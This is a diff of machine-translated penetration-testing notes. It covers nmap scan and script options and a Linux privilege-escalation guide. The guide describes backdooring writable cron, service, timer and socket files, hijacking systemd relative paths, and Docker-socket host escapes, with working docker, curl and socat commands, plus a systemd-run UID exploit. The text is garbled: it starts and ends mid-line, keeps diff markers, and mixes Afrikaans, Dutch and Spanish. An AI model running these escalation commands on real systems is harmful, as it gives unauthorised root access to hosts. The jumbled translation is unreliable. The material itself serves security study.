(RST-venster = 0), gefiltreer (ICMP onbereikbaar of niks). Nie alle rekenaars werk op hierdie manier nie, so as dit alles gesluit is, werk dit nie, as dit 'n paar oop is, werk dit goed, en as dit baie oop en min gesluit is, werk dit die ander kant toe. +* **`-sI`:** Idle skandering. Vir gevalle waar daar 'n aktiewe vuurmuur is, maar ons weet dat dit nie na 'n sekere IP filter nie (of wanneer ons eenvoudig anonimiteit wil hê), kan ons die zombie skanderingsinstrument gebruik (dit werk vir alle poorte), om moontlike zombies te soek, kan ons die ipidseq skrip of die exploit auxiliary/scanner/ip/ipidseq gebruik. Hierdie skanderingsinstrument is gebaseer op die IPID-nommer van die IP-pakkies. +* **`--badsum`:** Dit stuur die som verkeerd, die rekenaars sal die pakkies verwerp, maar die vuurmuure kan iets antwoord, dit word gebruik om vuurmuure op te spoor. +* **`-sZ`:** "Vreemde" SCTP-skanderingsinstrument, wanneer sondes met koekie-echo-fragmente gestuur word, moet dit laat val word as dit oop is of met ABORT geantwoord word as dit gesluit is. Dit kan deur vuurmuure gaan waardeur init nie kan gaan nie +**--osscan-guess** Wanneer OS-detectie niet perfect is, zorgt dit ervoor dat er meer inspanning wordt geleverd. **Scripts** \--script _\_|_\_|_\_|_\_\[,...] -Para usar los de por efecto vale con -sC o --script=default +Om de standaardscripts te gebruiken, volstaat het om -sC of --script=default te gebruiken. -Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln +De beschikbare categorieën zijn: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version en vuln. -* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación -* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta -* **Discovery:** recupera información del _target_ o víctima -* **External:** _script_ para utilizar recursos externos -* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_ -* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras) -* **Safe:** ejecuta _scripts_ que no son intrusivos -* **Vuln:** descubre las vulnerabilidades más conocidas -* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles +* **Auth:** voert alle beschikbare scripts uit voor authenticatie. +* **Default:** voert de standaard basis scripts van de tool uit. +* **Discovery:** haalt informatie op van het doelwit of slachtoffer. +* **External:** script om externe bronnen te gebruiken. +* **Intrusive:** gebruikt scripts die als indringend worden beschouwd voor het doelwit of slachtoffer. +* **Malware:** controleert of er open verbindingen zijn door kwaadaardige code of achterdeuren. +* **Safe:** voert scripts uit die niet indringend zijn. +* **Vuln:** ontdekt de meest bekende kwetsbaarheden. +* **All:** voert alle beschikbare NSE-scripts uit. -Para buscar scripts: +Om scripts te zoeken: -**nmap --script-help="http-\*" -> Los que empiecen por http-** +**nmap --script-help="http-\*" -> Die wat met http- begin** -**nmap --script-help="not intrusive" -> Todos menos esos** +**nmap --script-help="not intrusive" -> Alles behalwe dit** -**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos** +**nmap --script-help="default or safe" -> Die in een van beide of beide categorieën vallen** -**nmap --script-help="default and safe" --> Los que estan en ambos** +**nmap --script-help="default and safe" --> Die in beide categorieën vallen** **nmap --script-help="(default or safe or intrusive) and not http-\*"** @@ -108,43 +91,43 @@ Para buscar scripts: \--script-help _\_|_\_|_\_|_\_|all\[,...] -\--script-trace ---> Da info de como va elscript +\--script-trace ---> Geeft informatie over de voortgang van het script. \--script-updatedb -**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros. +Om een script te gebruiken, hoef je alleen maar het volgende in te voeren: nmap --script Naam\_van\_script doelwit --> Door het script op te geven, wordt zowel het script als de scanner uitgevoerd. Je kunt ook scanneropties toevoegen, zoals "safe=1", zodat alleen veilige scripts worden uitgevoerd. -**Control tiempo** +**Tijdbeheer** -**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing. +**Nmap kan de tijd in seconden, minuten, ms aanpassen:** --host-timeout arguments 900000ms, 900, 900s en 15m doen allemaal hetzelfde. -Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256. +Nmap verdeelt het totale aantal te scannen hosts in groepen en analyseert deze groepen in blokken, zodat het pas naar het volgende blok gaat nadat alle hosts zijn geanalyseerd (en de gebruiker ontvangt ook geen updates totdat het blok is geanalyseerd). Op deze manier is het voor Nmap efficiënter om grote groepen te gebruiken. Standaard gebruikt het 256 voor klasse C. -Se puede cambiar con\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Adjust parallel scan group sizes) +Dit kan worden gewijzigd met **--min-hostgroup** _**\**_**;** **--max-hostgroup** _**\**_ (Pas de grootte van parallelle scantaken aan) -Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ +Het aantal parallelle scanners kan worden gecontroleerd, maar het is beter om dit niet te doen (Nmap heeft al automatische controle op basis van de netwerkstatus): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ -Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\ #Wait until it is executed /tmp/bash -p ``` - -If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you - +As die skripsie wat deur root uitgevoer word 'n **gids gebruik waarin jy volle toegang het**, mag dit nuttig wees om daardie gids te verwyder en 'n **symlink-gids na 'n ander gids te skep** wat 'n skrips beheer deur jou bedien. ```bash ln -d -s ``` +### Gereelde cron-werkies -### Frequent cron jobs - -You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. - -For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do: +Jy kan die prosesse monitor om te soek na prosesse wat elke 1, 2 of 5 minute uitgevoer word. Miskien kan jy daarvan gebruik maak en voorregte verhoog. +Byvoorbeeld, om **elke 0.1s vir 1 minuut te monitor**, **sorteer volgens minder uitgevoerde opdragte** en die opdragte te verwyder wat die meeste uitgevoer is, kan jy doen: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` +**Jy kan ook gebruik maak van** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (dit sal elke proses monitor en lys wat begin). -**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts). - -### Invisible cron jobs - -It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char): +### Onsigbare cron-take +Dit is moontlik om 'n cron-taak te skep **deur 'n wagenretour na 'n kommentaar te plaas** (sonder 'n nuwe lyn karakter), en die cron-taak sal werk. Voorbeeld (let op die wagenretour karakter): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` +## Dienste -## Services +### Skryfbare _.service_ lêers -### Writable _.service_ files +Kyk of jy enige `.service` lêer kan skryf. As jy kan, **kan jy dit wysig** sodat dit jou **agterdeur uitvoer** wanneer die diens **begin**, **herbegin** of **gestop** word (miskien moet jy wag totdat die masjien herlaai word).\ +Byvoorbeeld, skep jou agterdeur binne die .service lêer met **`ExecStart=/tmp/script.sh`** -Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\ -For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`** +### Skryfbare diens-binêre lêers -### Writable service binaries +Hou in gedagte dat as jy **skryftoestemmings het oor binêre lêers wat deur dienste uitgevoer word**, jy hulle kan verander na agterdeure sodat wanneer die dienste heruitgevoer word, die agterdeure uitgevoer sal word. -Keep in mind that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed. - -### systemd PATH - Relative Paths - -You can see the PATH used by **systemd** with: +### systemd-PAD - Relatiewe paaie +Jy kan die PAD wat deur **systemd** gebruik word, sien met: ```bash systemctl show-environment ``` - -If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like: - +As jy vind dat jy kan **skryf** in enige van die lêers van die pad, kan jy moontlik **voorregte verhoog**. Jy moet soek na **relatiewe paaie wat gebruik word in dienskonfigurasie**-lêers soos: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` +Vervolgens skep 'n **uitvoerbare** lêer met dieselfde naam as die relatiewe pad binêre lêer binne die systemd PAD-vouer waarin jy kan skryf, en wanneer die diens gevra word om die kwesbare aksie (**Begin**, **Stop**, **Herlaai**) uit te voer, sal jou **agterdeur uitgevoer word** (ongepriviligeerde gebruikers kan gewoonlik nie dienste begin/stop nie, maar kyk of jy `sudo -l` kan gebruik). -Then, create an **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (**Start**, **Stop**, **Reload**), your **backdoor will be executed** (unprivileged users usually cannot start/stop services but check if you can use `sudo -l`). +**Leer meer oor dienste met `man systemd.service`.** -**Learn more about services with `man systemd.service`.** +## **Tydskakelaars** -## **Timers** - -**Timers** are systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** can be used as an alternative to cron as they have built-in support for calendar time events and monotonic time events and can be run asynchronously. - -You can enumerate all the timers with: +**Tydskakelaars** is systemd eenheidslêers waarvan die naam eindig op `**.timer**` wat `**.service**` lêers of gebeurtenisse beheer. **Tydskakelaars** kan gebruik word as 'n alternatief vir cron, aangesien hulle ingeboude ondersteuning vir kalender-tydgebeurtenisse en monotoniese tydgebeurtenisse het en asinkronies uitgevoer kan word. +Jy kan al die tydskakelaars opsom met: ```bash systemctl list-timers --all ``` +### Skryfbare timers -### Writable timers - -If you can modify a timer you can make it execute some existents of systemd.unit (like a `.service` or a `.target`) - +As jy 'n tydhouer kan wysig, kan jy dit laat uitvoer met bestaande systemd.unit (soos 'n `.service` of 'n `.target`) ```bash Unit=backdoor.service ``` +In die dokumentasie kan jy lees wat die Eenheid is: -In the documentation you can read what the Unit is: +> Die eenheid wat geaktiveer moet word wanneer hierdie tydtuig verloop. Die argument is 'n eenheidsnaam, waarvan die agtervoegsel nie ".timer" is nie. As dit nie gespesifiseer word nie, is hierdie waarde verstek 'n diens wat dieselfde naam as die tydtuig-eenheid het, behalwe vir die agtervoegsel. (Sien hierbo.) Dit word aanbeveel dat die geaktiveerde eenheidsnaam en die eenheidsnaam van die tydtuig-eenheid identies genoem word, behalwe vir die agtervoegsel. -> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. +Daarom sal jy hierdie toestemming moet misbruik deur: -Therefore, to abuse this permission you would need to: +* Vind 'n systemd-eenheid (soos 'n `.service`) wat 'n **skryfbare binêre lêer uitvoer** +* Vind 'n systemd-eenheid wat 'n **relatiewe pad uitvoer** en jy het **skryfregte** oor die **systemd-PAD** (om daardie uitvoerbare lêer na te boots) -* Find some systemd unit (like a `.service`) that is **executing a writable binary** -* Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** (to impersonate that executable) +**Leer meer oor tydtuie met `man systemd.timer`.** -**Learn more about timers with `man systemd.timer`.** - -### **Enabling Timer** - -To enable a timer you need root privileges and to execute: +### **Tydtuig aktiveer** +Om 'n tydtuig te aktiveer, benodig jy root-regte en voer die volgende uit: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` - -Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` +Let daarop dat die **tydhouer** geaktiveer word deur 'n simboliese skakel daarvan te skep op `/etc/systemd/system/.wants/.timer` ## Sockets -Unix Domain Sockets (UDS) enable **process communication** on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through `.socket` files. +Unix Domain Sockets (UDS) maak **proseskommunikasie** moontlik op dieselfde of verskillende rekenaars binne klient-bedienermodelle. Hulle maak gebruik van standaard Unix-beskrywerlêers vir inter-rekenaarkommunikasie en word opgestel deur middel van `.socket`-lêers. -Sockets can be configured using `.socket` files. +Sockets kan gekonfigureer word met behulp van `.socket`-lêers. -**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured: +**Leer meer oor sockets met `man systemd.socket`.** Binne hierdie lêer kan verskeie interessante parameters gekonfigureer word: -* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where it is going to listen** to the socket (the path of the AF\_UNIX socket file, the IPv4/6 and/or port number to listen, etc.) -* `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`. -* `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process. -* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively. -* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option. +* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hierdie opsies is verskillend, maar 'n opsomming word gebruik om aan te dui **waar dit gaan luister** na die socket (die pad van die AF\_UNIX socket-lêer, die IPv4/6 en/of poortnommer om na te luister, ens.) +* `Accept`: Neem 'n booleaanse argument. As dit **waar** is, word 'n **diensinstansie gegenereer vir elke inkomende verbinding** en word slegs die verbindingssocket daaraan oorgedra. As dit **onwaar** is, word al die luisterende sockets self **oorgedra aan die gestarte dienseenheid**, en slegs een dienseenheid word gegenereer vir alle verbindinge. Hierdie waarde word geïgnoreer vir datagramsockets en FIFO's waar 'n enkele dienseenheid onvoorwaardelik al die inkomende verkeer hanteer. **Standaard onwaar**. Vir prestasie-redes word dit aanbeveel om nuwe daemons slegs op 'n manier te skryf wat geskik is vir `Accept=no`. +* `ExecStartPre`, `ExecStartPost`: Neem een of meer opdraglyne, wat uitgevoer word **voor** of **na** die skep en bind van die luisterende **sockets**/FIFO's. Die eerste token van die opdraglyn moet 'n absolute lêernaam wees, gevolg deur argumente vir die proses. +* `ExecStopPre`, `ExecStopPost`: Addisionele **opdragte** wat **voor** of **na** die sluit en verwyder van die luisterende **sockets**/FIFO's uitgevoer word. +* `Service`: Spesifiseer die **diens**eenheidsnaam **om te aktiveer** met **inkomende verkeer**. Hierdie instelling is slegs toegelaat vir sockets met Accept=no. Dit is standaard die diens wat dieselfde naam as die socket dra (met die agtervoegsel vervang). In die meeste gevalle behoort dit nie nodig te wees om hierdie opsie te gebruik nie. -### Writable .socket files +### Skryfbare .socket-lêers -If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\ -_Note that the system must be using that socket file configuration or the backdoor won't be executed_ +As jy 'n **skryfbare** `.socket`-lêer vind, kan jy aan die begin van die `[Socket]`-afdeling iets soos `ExecStartPre=/home/kali/sys/backdoor` byvoeg en die agterdeur sal uitgevoer word voordat die socket geskep word. Jy sal dus **waarskynlik moet wag totdat die masjien herlaai word.**\ +Merk op dat die stelsel daardie socketlêerkonfigurasie moet gebruik of die agterdeur sal nie uitgevoer word nie. -### Writable sockets +### Skryfbare sockets -If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability. - -### Enumerate Unix Sockets +As jy enige **skryfbare socket** identifiseer (_nou praat ons van Unix Sockets en nie van die konfigurasie `.socket`-lêers nie_), kan jy met daardie socket **kommunikeer** en dalk 'n kwesbaarheid uitbuit. +### Enumereer Unix Sockets ```bash netstat -a -p --unix ``` +### Rou verbinding -### Raw connection +Om een ​​ruwe verbinding tot stand te brengen met een doelhost, kunt u de `nc` (netcat) opdracht gebruiken. Deze opdracht stelt u in staat om TCP- of UDP-verbindingen te maken en te beheren. +Om een ​​TCP-verbinding te maken met een doelhost op een specifieke poort, gebruikt u het volgende commando: + +```bash +nc +``` + +Bijvoorbeeld: + +```bash +nc 192.168.0.10 8080 +``` + +Om een ​​UDP-verbinding te maken, voegt u de `-u` vlag toe aan het commando: + +```bash +nc -u +``` + +Bijvoorbeeld: + +```bash +nc -u 192.168.0.10 1234 +``` + +Zodra de verbinding tot stand is gebracht, kunt u gegevens verzenden en ontvangen via de terminal. ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket @@ -577,96 +618,91 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` - -**Exploitation example:** +**Exploitasie-voorbeeld:** {% content-ref url="socket-command-injection.md" %} [socket-command-injection.md](socket-command-injection.md) {% endcontent-ref %} -### HTTP sockets - -Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but the files acting as unix sockets_). You can check this with: +### HTTP-aansluitings +Let daarop dat daar moontlik **aansluitings is wat wag vir HTTP-aanvrae** (_Ek praat nie van .socket-lêers nie, maar van die lêers wat as Unix-aansluitings optree_). Jy kan dit nagaan met: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` +As die sokket **reageer met 'n HTTP** versoek, kan jy daarmee **kommunikeer** en dalk **van 'n kwesbaarheid gebruik maak**. -If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. +### Skryfbare Docker Sokket -### Writable Docker Socket +Die Docker sokket, wat dikwels gevind word by `/var/run/docker.sock`, is 'n kritieke lêer wat beveilig moet word. Standaard is dit skryfbaar deur die `root` gebruiker en lede van die `docker` groep. As jy skryftoegang tot hierdie sokket het, kan dit lei tot bevoorregte eskalasie. Hier is 'n uiteensetting van hoe dit gedoen kan word en alternatiewe metodes as die Docker CLI nie beskikbaar is nie. -The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available. - -#### **Privilege Escalation with Docker CLI** - -If you have write access to the Docker socket, you can escalate privileges using the following commands: +#### **Bevoorregte Eskalasie met Docker CLI** +As jy skryftoegang tot die Docker sokket het, kan jy bevoorregte eskalasie bewerkstellig deur die volgende opdragte te gebruik: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` +Hierdie opdragte stel jou in staat om 'n houer uit te voer met toegang op roetvlak tot die gasheer se lêersisteem. -These commands allow you to run a container with root-level access to the host's file system. +#### **Deur die Docker API Direk** -#### **Using Docker API Directly** +In gevalle waar die Docker CLI nie beskikbaar is nie, kan die Docker sokket steeds gemanipuleer word deur die Docker API en `curl` opdragte. -In cases where the Docker CLI isn't available, the Docker socket can still be manipulated using the Docker API and `curl` commands. +1. **Lys Docker-beelde:** +Haal die lys beskikbare beelde op. -1. **List Docker Images:** - Retrieve the list of available images. +```bash +curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json +``` - ```bash - curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json - ``` +2. **Skep 'n Houer:** +Stuur 'n versoek om 'n houer te skep wat die gasheer se roetgids monteer. -2. **Create a Container:** - Send a request to create a container that mounts the host system's root directory. +```bash +curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create +``` - ```bash - curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create - ``` +Begin die nuutgeskepte houer: - Start the newly created container: +```bash +curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start +``` - ```bash - curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start - ``` +3. **Koppel aan die Houer:** +Gebruik `socat` om 'n verbinding met die houer tot stand te bring, wat opdraguitvoering binne-in die houer moontlik maak. -3. **Attach to the Container:** - Use `socat` to establish a connection to the container, enabling command execution within it. +```bash +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp +``` - ```bash - socat - UNIX-CONNECT:/var/run/docker.sock - POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 - Host: - Connection: Upgrade - Upgrade: tcp - ``` +Nadat die `socat`-verbinding opgestel is, kan jy opdragte direk in die houer uitvoer met toegang op roetvlak tot die gasheer se lêersisteem. -After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem. +### Ander -### Others +Let daarop dat as jy skryftoestemmings oor die Docker sokket het omdat jy **binne die groep `docker`** is, het jy [**meer maniere om voorregte te verhoog**](interesting-groups-linux-pe/#docker-group). As die [**docker API na 'n poort luister** kan jy dit ook moontlik kompromitteer](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). - -Check **more ways to break out from docker or abuse it to escalate privileges** in: +Kyk na **meer maniere om uit te breek uit Docker of dit te misbruik om voorregte te verhoog** in: {% content-ref url="docker-security/" %} [docker-security](docker-security/) {% endcontent-ref %} -## Containerd (ctr) privilege escalation +## Containerd (ctr) voorregverhoging -If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat jy die **`ctr`**-opdrag kan gebruik, lees dan die volgende bladsy aangesien **jy dit moontlik kan misbruik om voorregte te verhoog**: {% content-ref url="containerd-ctr-privilege-escalation.md" %} [containerd-ctr-privilege-escalation.md](containerd-ctr-privilege-escalation.md) {% endcontent-ref %} -## **RunC** privilege escalation +## **RunC** voorregverhoging -If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat jy die **`runc`**-opdrag kan gebruik, lees dan die volgende bladsy aangesien **jy dit moontlik kan misbruik om voorregte te verhoog**: {% content-ref url="runc-privilege-escalation.md" %} [runc-privilege-escalation.md](runc-privilege-escalation.md) @@ -674,37 +710,34 @@ If you find that you can use the **`runc`** command read the following page as * ## **D-Bus** -D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to efficiently interact and share data. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication. +D-Bus is 'n gesofistikeerde **interproseskommunikasie (IPC)-sisteem** wat toepassings in staat stel om doeltreffend met mekaar te kommunikeer en data te deel. Dit is ontwerp met die moderne Linux-sisteem in gedagte en bied 'n robuuste raamwerk vir verskillende vorme van toepassingskommunikasie. -The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it aids in broadcasting events or signals, fostering seamless integration among system components. For instance, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, enhancing user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex. +Die stelsel is veelsydig en ondersteun basiese IPC wat data-uitruiling tussen prosesse verbeter, soortgelyk aan **verbeterde UNIX-domeinsokkets**. Dit help ook om gebeure of seine uit te saai, wat naadlose integrasie tussen stelselkomponente bevorder. Byvoorbeeld, 'n sein van 'n Bluetooth-daemon oor 'n inkomende oproep kan 'n musiekspeler laat demp, wat die gebruikerservaring verbeter. Daarbenewens ondersteun D-Bus 'n afgeleë objeksisteem wat diensversoeke en metode-aanroepings tussen toepassings vereenvoudig, wat prosesse wat tradisioneel ingewikkeld was, stroomlyn. -D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. These policies specify interactions with the bus, potentially allowing for privilege escalation through the exploitation of these permissions. +D-Bus werk volgens 'n **toelaat/weier-model** en bestuur boodskaptoestemmings (metode-oproepe, seinuitsette, ens.) gebaseer op die kumulatiewe effek van ooreenstemmende beleidsreëls. Hierdie beleide spesifiseer interaksies met die bus en kan moontlik voorregverhoging moontlik maak deur die uitbuiting van hierdie toestemmings. -An example of such a policy in `/etc/dbus-1/system.d/wpa_supplicant.conf` is provided, detailing permissions for the root user to own, send to, and receive messages from `fi.w1.wpa_supplicant1`. - -Policies without a specified user or group apply universally, while "default" context policies apply to all not covered by other specific policies. +'n Voorbeeld van so 'n beleid in `/etc/dbus-1/system.d/wpa_supplicant.conf` word verskaf, wat toestemmings vir die root-gebruiker beskryf om boodskappe aan `fi.w1.wpa_supplicant1` te besit, te stuur en te ontvang. +Beleide sonder 'n gespesifiseerde gebruiker of groep is universeel van toepassing, terwyl "standaard" konteksbeleide van toepassing is op almal wat nie deur ander spesifieke beleide gedek word nie. ```xml - - - - + + + + ``` - -**Learn how to enumerate and exploit a D-Bus communication here:** +**Leer hoe om 'n D-Bus kommunikasie te ondersoek en uit te buit hier:** {% content-ref url="d-bus-enumeration-and-command-injection-privilege-escalation.md" %} [d-bus-enumeration-and-command-injection-privilege-escalation.md](d-bus-enumeration-and-command-injection-privilege-escalation.md) {% endcontent-ref %} -## **Network** +## **Netwerk** -It's always interesting to enumerate the network and figure out the position of the machine. - -### Generic enumeration +Dit is altyd interessant om die netwerk te ondersoek en die posisie van die masjien te bepaal. +### Generiese ondersoek ```bash #Hostname, hosts and DNS cat /etc/hostname /etc/hosts /etc/resolv.conf @@ -727,30 +760,24 @@ cat /etc/networks #Files used by network services lsof -i ``` +### Oop poorte -### Open ports - -Always check network services running on the machine that you weren't able to interact with before accessing it: - +Kyk altyd na netwerkdienste wat op die masjien loop en waarmee jy nie voorheen kon interaksie hê nie voordat jy dit toegang gee: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` +### Snuffel -### Sniffing - -Check if you can sniff traffic. If you can, you could be able to grab some credentials. - +Kyk of jy verkeer kan snuffel. As jy dit kan doen, kan jy dalk in staat wees om sekere geloofsbriewe te gryp. ``` timeout 1 tcpdump ``` +## Gebruikers -## Users - -### Generic Enumeration - -Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** +### Algemene Enumerasie +Kyk **wie** jy is, watter **voorregte** het jy, watter **gebruikers** is in die stelsels, watter een kan **aanmeld** en watter een het **root-voorregte:** ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -772,67 +799,69 @@ for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | so #Current user PGP keys gpg --list-keys 2>/dev/null ``` +### Groot UID -### Big UID +Sommige Linux-weergawes is geraak deur 'n fout wat gebruikers met **UID > INT\_MAX** toelaat om voorregte te verhoog. Meer inligting: [hier](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [hier](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) en [hier](https://twitter.com/paragonsec/status/1071152249529884674).\ +**Exploiteer dit** met behulp van: **`systemd-run -t /bin/bash`** -Some Linux versions were affected by a bug that allows users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ -**Exploit it** using: **`systemd-run -t /bin/bash`** +### Groepe -### Groups - -Check if you are a **member of some group** that could grant you root privileges: +Kyk of jy 'n **lid van 'n groep** is wat jou root-voorregte kan gee: {% content-ref url="interesting-groups-linux-pe/" %} [interesting-groups-linux-pe](interesting-groups-linux-pe/) {% endcontent-ref %} -### Clipboard - -Check if anything interesting is located inside the clipboard (if possible) +### Knipbord +Kyk of daar iets interessants binne die knipbord is (indien moontlik) ```bash if [ `which xclip 2>/dev/null` ]; then - echo "Clipboard: 